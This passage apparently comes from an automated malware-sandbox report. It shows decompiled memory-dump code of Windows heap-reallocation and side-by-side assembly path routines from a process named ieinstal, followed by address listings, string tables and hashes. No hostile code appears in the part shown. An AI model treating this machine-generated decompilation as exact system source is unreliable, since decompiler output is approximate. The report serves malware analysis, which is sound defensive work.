						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E1E7002E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E1E64B910();
						} else {
							E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E1E64B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E1E65FED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E1E700835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E1E64753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x1e7447c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x1e7447cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1e7447ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E1E64B910();
							} else {
								E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E1E6F823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E1E64B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x1e7447a1 = 1;
								 *0x1e744100 = 0;
								asm("int3");
								 *0x1e7447a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E1E64B910();
						} else {
							E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1E64B910("Just reallocated block at %p to %Ix bytes\n",  *0x1e7447c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x1e7447c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E1E662710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E1E70D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E1E683AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E1E67FDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E1E700D24(_t281);
								__eflags = 0;
								E1E700835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x1e7447cc;
							if( *0x1e7447cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E1E70D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E1E683AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x1e7447cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1e7447ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E1E64B910();
								} else {
									E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E1E6F823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E1E64B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x1e7447a1 = 1;
									 *0x1e744100 = 0;
									asm("int3");
									 *0x1e7447a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E1E64B910();
						} else {
							E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1E64B910("About to reallocate block at %p to %Ix bytes\n",  *0x1e7447c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x1e74374c; // 0x0
					 *0x1e7491e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}





































                                                                                                                0x1e6ffdf4
                                                                                                                0x1e6ffdf6
                                                                                                                0x1e6ffdfb
                                                                                                                0x1e6ffe02
                                                                                                                0x1e6ffe04
                                                                                                                0x1e6ffe09
                                                                                                                0x1e6ffe0c
                                                                                                                0x1e6ffe16
                                                                                                                0x1e6ffe35
                                                                                                                0x1e6ffe38
                                                                                                                0x1e6ffe46
                                                                                                                0x1e6ffe4b
                                                                                                                0x1e6ffe4d
                                                                                                                0x1e700277
                                                                                                                0x1e700277
                                                                                                                0x1e70027a
                                                                                                                0x1e70027a
                                                                                                                0x1e7002c2
                                                                                                                0x1e7002c9
                                                                                                                0x1e7002ce
                                                                                                                0x00000000
                                                                                                                0x1e7002ce
                                                                                                                0x1e6ffe56
                                                                                                                0x1e6ffe58
                                                                                                                0x1e6ffe62
                                                                                                                0x1e6ffe65
                                                                                                                0x1e6ffe69
                                                                                                                0x1e6ffe72
                                                                                                                0x1e6ffe72
                                                                                                                0x1e6ffe6b
                                                                                                                0x1e6ffe6b
                                                                                                                0x1e6ffe6b
                                                                                                                0x1e6ffe81
                                                                                                                0x1e6ffe84
                                                                                                                0x1e6ffe87
                                                                                                                0x1e6ffe8a
                                                                                                                0x1e700231
                                                                                                                0x1e700231
                                                                                                                0x1e700237
                                                                                                                0x1e70023a
                                                                                                                0x1e700259
                                                                                                                0x1e70025e
                                                                                                                0x1e70023c
                                                                                                                0x1e700251
                                                                                                                0x1e700256
                                                                                                                0x1e700264
                                                                                                                0x1e70026f
                                                                                                                0x00000000
                                                                                                                0x1e700274
                                                                                                                0x1e6ffe90
                                                                                                                0x1e6ffe93
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6ffe9b
                                                                                                                0x1e6ffe9f
                                                                                                                0x1e6ffea2
                                                                                                                0x1e6ffeaa
                                                                                                                0x1e6ffeaf
                                                                                                                0x1e6ffeb6
                                                                                                                0x1e6ffeb6
                                                                                                                0x1e6ffebb
                                                                                                                0x1e6ffebb
                                                                                                                0x1e6ffec2
                                                                                                                0x1e6ffec7
                                                                                                                0x1e6ffeca
                                                                                                                0x1e6ffecd
                                                                                                                0x1e6ffed1
                                                                                                                0x1e6ffeda
                                                                                                                0x1e6ffeda
                                                                                                                0x1e6ffeda
                                                                                                                0x1e6ffedc
                                                                                                                0x1e6ffedf
                                                                                                                0x1e6ffee7
                                                                                                                0x1e6ffee9
                                                                                                                0x1e6ffeee
                                                                                                                0x1e6ffef0
                                                                                                                0x1e700122
                                                                                                                0x1e700122
                                                                                                                0x1e700125
                                                                                                                0x1e700127
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e70012d
                                                                                                                0x1e700133
                                                                                                                0x1e700139
                                                                                                                0x1e7001a7
                                                                                                                0x1e7001aa
                                                                                                                0x1e7001ad
                                                                                                                0x1e7001b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e7001bc
                                                                                                                0x1e7001c3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e7001cd
                                                                                                                0x1e7001d4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e7001da
                                                                                                                0x1e7001e0
                                                                                                                0x1e7001e3
                                                                                                                0x1e700202
                                                                                                                0x1e700207
                                                                                                                0x1e7001e5
                                                                                                                0x1e7001fa
                                                                                                                0x1e7001ff
                                                                                                                0x1e700218
                                                                                                                0x1e700219
                                                                                                                0x1e700224
                                                                                                                0x1e70017e
                                                                                                                0x1e70017e
                                                                                                                0x1e700184
                                                                                                                0x1e700188
                                                                                                                0x1e70018e
                                                                                                                0x1e700195
                                                                                                                0x1e70019b
                                                                                                                0x1e70019c
                                                                                                                0x1e70019c
                                                                                                                0x00000000
                                                                                                                0x1e700188
                                                                                                                0x1e70013b
                                                                                                                0x1e70013e
                                                                                                                0x1e70015d
                                                                                                                0x1e700162
                                                                                                                0x1e700140
                                                                                                                0x1e700155
                                                                                                                0x1e70015a
                                                                                                                0x1e700168
                                                                                                                0x1e700176
                                                                                                                0x00000000
                                                                                                                0x1e6ffef6
                                                                                                                0x1e6ffef6
                                                                                                                0x1e6ffefc
                                                                                                                0x1e6fff02
                                                                                                                0x1e6fff70
                                                                                                                0x1e6fff73
                                                                                                                0x1e6fff76
                                                                                                                0x1e6fff7b
                                                                                                                0x1e700068
                                                                                                                0x1e700070
                                                                                                                0x1e700075
                                                                                                                0x1e700078
                                                                                                                0x1e70007a
                                                                                                                0x1e700080
                                                                                                                0x1e700080
                                                                                                                0x1e700083
                                                                                                                0x1e700087
                                                                                                                0x1e700090
                                                                                                                0x1e700090
                                                                                                                0x1e700090
                                                                                                                0x1e700092
                                                                                                                0x1e700094
                                                                                                                0x1e700097
                                                                                                                0x1e70009a
                                                                                                                0x1e70009f
                                                                                                                0x1e7000a9
                                                                                                                0x1e7000ac
                                                                                                                0x1e7000ae
                                                                                                                0x1e7000af
                                                                                                                0x1e7000b3
                                                                                                                0x1e7000b3
                                                                                                                0x1e7000ac
                                                                                                                0x1e7000b8
                                                                                                                0x1e7000bc
                                                                                                                0x1e7000ec
                                                                                                                0x1e7000ef
                                                                                                                0x1e7000f2
                                                                                                                0x1e7000be
                                                                                                                0x1e7000c0
                                                                                                                0x1e7000c5
                                                                                                                0x1e7000ca
                                                                                                                0x1e7000d1
                                                                                                                0x1e7000e3
                                                                                                                0x1e7000d3
                                                                                                                0x1e7000d4
                                                                                                                0x1e7000d9
                                                                                                                0x1e7000dc
                                                                                                                0x1e7000df
                                                                                                                0x1e7000df
                                                                                                                0x1e7000e6
                                                                                                                0x1e7000e6
                                                                                                                0x1e7000f5
                                                                                                                0x1e7000f9
                                                                                                                0x1e7000fc
                                                                                                                0x1e700108
                                                                                                                0x1e70010e
                                                                                                                0x1e70010e
                                                                                                                0x1e70010e
                                                                                                                0x1e7000fc
                                                                                                                0x1e700114
                                                                                                                0x1e700119
                                                                                                                0x1e70011d
                                                                                                                0x00000000
                                                                                                                0x1e70011d
                                                                                                                0x1e6fff81
                                                                                                                0x1e6fff88
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6fff8e
                                                                                                                0x1e6fff91
                                                                                                                0x1e6fff94
                                                                                                                0x1e6fff97
                                                                                                                0x1e6fff9c
                                                                                                                0x1e6fffa6
                                                                                                                0x1e6fffa9
                                                                                                                0x1e6fffab
                                                                                                                0x1e6fffb0
                                                                                                                0x1e6fffb5
                                                                                                                0x1e6fffb5
                                                                                                                0x1e6fffa9
                                                                                                                0x1e6fffb8
                                                                                                                0x1e6fffbc
                                                                                                                0x1e6fffce
                                                                                                                0x1e6fffd1
                                                                                                                0x1e6fffd4
                                                                                                                0x1e6fffbe
                                                                                                                0x1e6fffc0
                                                                                                                0x1e6fffc5
                                                                                                                0x1e6fffc8
                                                                                                                0x1e6fffc8
                                                                                                                0x1e6fffd7
                                                                                                                0x1e6fffd9
                                                                                                                0x1e6fffdd
                                                                                                                0x1e6fffe0
                                                                                                                0x1e6fffea
                                                                                                                0x1e6ffff0
                                                                                                                0x1e6ffff0
                                                                                                                0x1e6ffff0
                                                                                                                0x1e6ffff2
                                                                                                                0x1e6ffff5
                                                                                                                0x1e700065
                                                                                                                0x1e700065
                                                                                                                0x1e6ffff7
                                                                                                                0x1e6ffff7
                                                                                                                0x1e6ffffe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e700004
                                                                                                                0x1e70000b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e70000d
                                                                                                                0x1e700013
                                                                                                                0x1e700016
                                                                                                                0x1e700035
                                                                                                                0x1e70003a
                                                                                                                0x1e700018
                                                                                                                0x1e70002d
                                                                                                                0x1e700032
                                                                                                                0x1e700040
                                                                                                                0x1e70004b
                                                                                                                0x1e70004c
                                                                                                                0x1e70004f
                                                                                                                0x1e700058
                                                                                                                0x1e70005d
                                                                                                                0x1e6fff47
                                                                                                                0x1e6fff47
                                                                                                                0x1e6fff4d
                                                                                                                0x1e6fff51
                                                                                                                0x1e6fff57
                                                                                                                0x1e6fff5e
                                                                                                                0x1e6fff64
                                                                                                                0x1e6fff65
                                                                                                                0x1e6fff65
                                                                                                                0x1e6fff51
                                                                                                                0x00000000
                                                                                                                0x1e6ffff5
                                                                                                                0x1e6fff04
                                                                                                                0x1e6fff07
                                                                                                                0x1e6fff26
                                                                                                                0x1e6fff2b
                                                                                                                0x1e6fff09
                                                                                                                0x1e6fff1e
                                                                                                                0x1e6fff23
                                                                                                                0x1e6fff31
                                                                                                                0x1e6fff3f
                                                                                                                0x1e6fff44
                                                                                                                0x00000000
                                                                                                                0x1e6fff44
                                                                                                                0x1e6ffe18
                                                                                                                0x1e6ffe20
                                                                                                                0x1e6ffe28
                                                                                                                0x1e6ffe2e
                                                                                                                0x1e7002d1
                                                                                                                0x1e7002d4
                                                                                                                0x1e7002e0
                                                                                                                0x1e7002e0

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                • API String ID: 0-1700792311
                                                                                                                • Opcode ID: 03960aa4e4f1a8a0d8bc29c52903ae0a98de262d1a26e63c461708a652d98f63
                                                                                                                • Instruction ID: 523887caddd911e5d51e23e998d0c3907fe544f62288728096c22a0c1eb3db10
                                                                                                                • Opcode Fuzzy Hash: 03960aa4e4f1a8a0d8bc29c52903ae0a98de262d1a26e63c461708a652d98f63
                                                                                                                • Instruction Fuzzy Hash: 9CD11335501685EFEB02CFA4C850AADBBF2FF0A320F948B59E4459B362C735AA41CF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E682EB8 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E1E682EB8(signed short __edx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, signed int* _a20) {
				signed int _v12;
				char _v536;
				signed int _v537;
				signed int* _v544;
				signed int _v548;
				intOrPtr _v552;
				signed short _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				signed short _v572;
				signed short _v576;
				signed int _v584;
				signed short _v588;
				signed short _v592;
				intOrPtr _v596;
				signed short _v600;
				char _v604;
				signed short _v608;
				signed short _v612;
				intOrPtr _v616;
				char* _v620;
				intOrPtr _v624;
				char _v628;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t92;
				signed short _t104;
				signed short _t107;
				short _t110;
				signed int _t117;
				char _t122;
				intOrPtr _t124;
				void* _t129;
				signed int _t133;
				short* _t137;
				signed int _t147;
				signed short _t148;
				intOrPtr _t149;
				signed short _t152;
				signed int _t154;
				short _t156;
				signed int _t169;
				void* _t170;
				void* _t171;
				signed short* _t173;
				void* _t174;
				void* _t175;
				short* _t178;
				intOrPtr _t179;
				signed int _t180;

				_v12 =  *0x1e74b370 ^ _t180;
				_t149 = _a8;
				_t92 = _a12;
				_t148 = __edx;
				_v568 = _t149;
				_v572 = _a16;
				_t173 = _a4;
				_v544 = _a20;
				_v548 = _v548 & 0;
				_v584 = 0;
				_t169 = 0;
				_v537 = 0;
				_v560 = 0;
				_v556 = 0;
				_v576 = 0;
				_t167 = _v572;
				_v564 = _t173;
				_v552 = _t92;
				if(_t167 != 0) {
					 *_t167 =  *_t167 & 0;
				}
				if(_v544 != _t169) {
					 *_v544 =  *_v544 & _t169;
					_t149 = _v568;
				}
				if(_t148 == 0 || _t173 == 0 || _t149 == 0 || _t92 == 0 || _t167 == 0 || _v544 == _t169) {
					_push(_v544);
					_push(_t167);
					_push(_t92);
					_push(_t149);
					_push(_t173);
					_push(_t148);
					_push(0);
					E1E6DEF10(0x33, 0, "SXS: %s() bad parameters\nSXS:  Flags:               0x%lx\nSXS:  Root:                %p\nSXS:  AssemblyDirectory:   %p\nSXS:  PreAllocatedString:  %p\nSXS:  DynamicString:       %p\nSXS:  StringUsed:          %p\nSXS:  OpenDirectoryHandle: %p\n", "RtlpProbeAssemblyStorageRootForAssembly");
					_t174 = 0xc000000d;
					goto L24;
				} else {
					_t152 =  *_t148 & 0x0000ffff;
					_t167 = _t152;
					_t171 = 0x5c;
					if(_t152 != 0) {
						_t147 =  *( *((intOrPtr*)(_t148 + 4)) + (_t152 >> 1) * 2 - 2) & 0x0000ffff;
						_t152 =  *_t148 & 0x0000ffff;
						if(_t147 != _t171) {
							if(_t147 != 0x2f) {
								_v537 = 1;
								_t167 = _t167 + 2;
							}
						}
					}
					_t104 = ( *_t173 & 0x0000ffff) + 4 + _t167;
					_v588 = _t104;
					if(_t104 > 0xfffe) {
						_push("SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.\n");
						_push(0);
						_push(0x33);
						E1E6DEF10();
						_t174 = 0xc0000106;
						L28:
						if(_v548 != 0) {
							_push(_v548);
							E1E692A80();
						}
						_pop(_t170);
						_pop(_t175);
						return E1E694B50(_t174, _t148, _v12 ^ _t180, _t167, _t170, _t175);
					}
					if(_t104 > 0x208) {
						_t176 = _t104 & 0x0000ffff;
						_t169 = E1E665D60(_t104 & 0x0000ffff);
						if(_t169 != 0) {
							_t107 =  *_t148 & 0x0000ffff;
							goto L15;
						}
						E1E6DEF10(0x33, _t106, "SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.\n", _t176);
						_t174 = 0xc0000017;
						goto L28;
					} else {
						_t169 =  &_v536;
						_t107 = _t152 & 0x0000ffff;
						L15:
						E1E6988C0(_t169,  *((intOrPtr*)(_t148 + 4)), _t107 & 0x0000ffff);
						_t178 = ( *_t148 & 0x0000ffff) + _t169;
						if(_v537 != 0) {
							_t110 = 0x5c;
							 *_t178 = _t110;
							_t178 = _t178 + 2;
						}
						E1E6988C0(_t178,  *((intOrPtr*)(_v564 + 4)),  *_v564 & 0x0000ffff);
						_t154 = _v564;
						_t167 = 0;
						 *((short*)(( *_t154 & 0x0000ffff) + _t178)) = 0;
						_t117 = (_v537 & 0x000000ff) + (_v537 & 0x000000ff) +  *_t154 +  *_t148;
						_t148 = 0;
						_v584 = _t117;
						if(E1E671C10(_t169,  &_v560, 0,  &_v604) == 0) {
							E1E6DEF10(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _t169);
							_t174 = 0xc000003a;
							goto L26;
						} else {
							_t122 = _v604;
							_t167 = _v556;
							_v576 = _v556;
							if(_t122 != 0) {
								_v560 = _t122;
								_v556 = _v600;
								_t124 = _v596;
							} else {
								_t124 = 0;
							}
							_v624 = _t124;
							_push(0x21);
							_v620 =  &_v560;
							_push(3);
							_push( &_v636);
							_v628 = 0x18;
							_push( &_v628);
							_push(0x100020);
							_v616 = 0x40;
							_push( &_v548);
							_v612 = _t148;
							_v608 = _t148;
							_t129 = E1E692CE0();
							_t148 = _v592;
							_t174 = _t129;
							if(_t148 != 0) {
								asm("lock xadd [ebx], ecx");
								if((_t154 | 0xffffffff) == 0) {
									_push( *((intOrPtr*)(_t148 + 4)));
									E1E692A80();
									E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t148);
								}
							}
							if(_t174 < 0) {
								if(_t174 == 0xc000000f || _t174 == 0xc0000034 || _t174 == 0xc000003a) {
									_t174 = 0xc0150004;
								} else {
									_push(_t174);
									E1E6DEF10(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _t169);
								}
								goto L24;
							} else {
								_t179 = _v568;
								_t148 = _v588;
								if(_t148 > ( *(_t179 + 2) & 0x0000ffff)) {
									if(_t169 ==  &_v536) {
										_t133 = E1E665D60(_t148);
										_t179 = _v552;
										 *(_t179 + 4) = _t133;
										if(_t133 != 0) {
											E1E6988C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
											L52:
											 *(_t179 + 2) = _t148;
											goto L23;
										}
										_t174 = 0xc0000017;
										goto L24;
									}
									_t179 = _v552;
									 *(_t179 + 4) = _t169;
									_t169 = 0;
									goto L52;
								} else {
									E1E6988C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
									L23:
									_t167 = _v572;
									_t156 = 0x5c;
									 *_t167 = _t179;
									_t137 = (_v584 & 0x0000ffff) +  *(_t179 + 4);
									 *_t137 = _t156;
									 *((short*)(_t137 + 2)) = 0;
									 *( *_t167) = _v584 + 2;
									_v548 = _v548 & 0x00000000;
									_t174 = 0;
									 *_v544 = _v548;
									L24:
									_t94 = _v576;
									if(_v576 != 0) {
										E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t94);
									}
									L26:
									if(_t169 != 0 && _t169 !=  &_v536) {
										E1E64BA80(_t169);
									}
									goto L28;
								}
							}
						}
					}
				}
			}
























































                                                                                                                0x1e682eca
                                                                                                                0x1e682ecd
                                                                                                                0x1e682ed0
                                                                                                                0x1e682ed4
                                                                                                                0x1e682ed6
                                                                                                                0x1e682edf
                                                                                                                0x1e682ee9
                                                                                                                0x1e682eec
                                                                                                                0x1e682ef4
                                                                                                                0x1e682efb
                                                                                                                0x1e682f01
                                                                                                                0x1e682f03
                                                                                                                0x1e682f09
                                                                                                                0x1e682f0f
                                                                                                                0x1e682f15
                                                                                                                0x1e682f1b
                                                                                                                0x1e682f21
                                                                                                                0x1e682f27
                                                                                                                0x1e682f2f
                                                                                                                0x1e682f31
                                                                                                                0x1e682f31
                                                                                                                0x1e682f39
                                                                                                                0x1e682f41
                                                                                                                0x1e682f43
                                                                                                                0x1e682f43
                                                                                                                0x1e682f4b
                                                                                                                0x1e6c27a9
                                                                                                                0x1e6c27af
                                                                                                                0x1e6c27b0
                                                                                                                0x1e6c27b1
                                                                                                                0x1e6c27b2
                                                                                                                0x1e6c27b3
                                                                                                                0x1e6c27b4
                                                                                                                0x1e6c27c4
                                                                                                                0x1e6c27cc
                                                                                                                0x00000000
                                                                                                                0x1e682f7d
                                                                                                                0x1e682f7d
                                                                                                                0x1e682f80
                                                                                                                0x1e682f84
                                                                                                                0x1e682f88
                                                                                                                0x1e682f8f
                                                                                                                0x1e682f94
                                                                                                                0x1e682f9a
                                                                                                                0x1e6c264b
                                                                                                                0x1e6c2651
                                                                                                                0x1e6c2658
                                                                                                                0x1e6c2658
                                                                                                                0x1e6c264b
                                                                                                                0x1e682f9a
                                                                                                                0x1e682fa6
                                                                                                                0x1e682fa8
                                                                                                                0x1e682fb3
                                                                                                                0x1e6c2660
                                                                                                                0x1e6c2665
                                                                                                                0x1e6c2667
                                                                                                                0x1e6c2669
                                                                                                                0x1e6c2671
                                                                                                                0x1e68316c
                                                                                                                0x1e683173
                                                                                                                0x1e6c27d6
                                                                                                                0x1e6c27dc
                                                                                                                0x1e6c27dc
                                                                                                                0x1e68317e
                                                                                                                0x1e68317f
                                                                                                                0x1e683189
                                                                                                                0x1e683189
                                                                                                                0x1e682fbe
                                                                                                                0x1e6c267b
                                                                                                                0x1e6c2684
                                                                                                                0x1e6c2688
                                                                                                                0x1e6c26a5
                                                                                                                0x00000000
                                                                                                                0x1e6c26a5
                                                                                                                0x1e6c2693
                                                                                                                0x1e6c269b
                                                                                                                0x00000000
                                                                                                                0x1e682fc4
                                                                                                                0x1e682fc4
                                                                                                                0x1e682fca
                                                                                                                0x1e682fcd
